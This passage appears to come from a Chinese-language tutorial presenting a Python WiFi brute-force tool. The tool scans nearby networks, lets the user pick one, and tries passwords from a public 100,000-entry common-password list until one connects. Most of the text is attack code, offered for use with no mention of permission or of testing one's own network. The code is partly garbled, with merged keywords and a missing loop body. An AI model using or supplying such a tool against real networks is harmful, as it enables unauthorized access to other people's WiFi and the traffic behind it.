暴力破解 目前已经获取并且选择了想要连接的WiFi，那么如何获取到它的密码呢？ 这里要用到一种比较常见的方式：暴力破解。 这里，要用到Github上一个项目，它收集了最常用的10万个WiFi密码。我们就用着10万个密码暴力解锁WiFi即可。 def brute_force(selected_network, passwords, args): for password in passwords: # necessary due to NetworkManager restart after unsuccessful attempt at login password = password.strip()​ # when when obtain password from url we need the decode utf-8 however we doesnt when reading from file if isinstance(password, str): decoded_line = password else: decoded_line = password.decode("utf-8")

print(bcolors.FAIL+"** RESULTS **: All passwords failed :("+bcolors.ENDC) 核心功能3个函数就完成了，只用了60行Python代码！ 下面就把它们串联在一起： def main(): require_root() args = argument_parser()​

if args.url isnotNone: passwords = fetch_password_from_url(args.url)

elif args.file isnotNone: file = open(args.file, "r") passwords = file.readlines() ifnot passwords: print("Password file cannot be empty!") exit(0) file.close() else: # fallback to the default list as the user didnt supplied a password list default_url = "https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10-million-password-list-top-100000.txt" passwords = fetch_password_from_url(default_url)​

func_call = start(1) networks = func_call[0] security_type = func_call[1]

ifnot networks: print("No networks found!") sys.exit(-1)​ display_targets(networks, security_type) max = len(networks) pick = prompt_for_target_choice(max) target = networks[pick]

print("\nWifi-bf is running. If you would like to see passwords being tested in realtime, enable the [--verbose] flag at start.")​ brute_force(target, passwords, args) 执行函数，就会在命令行下显示附近的WiFi列表，选择之后就开始逐个尝试密码。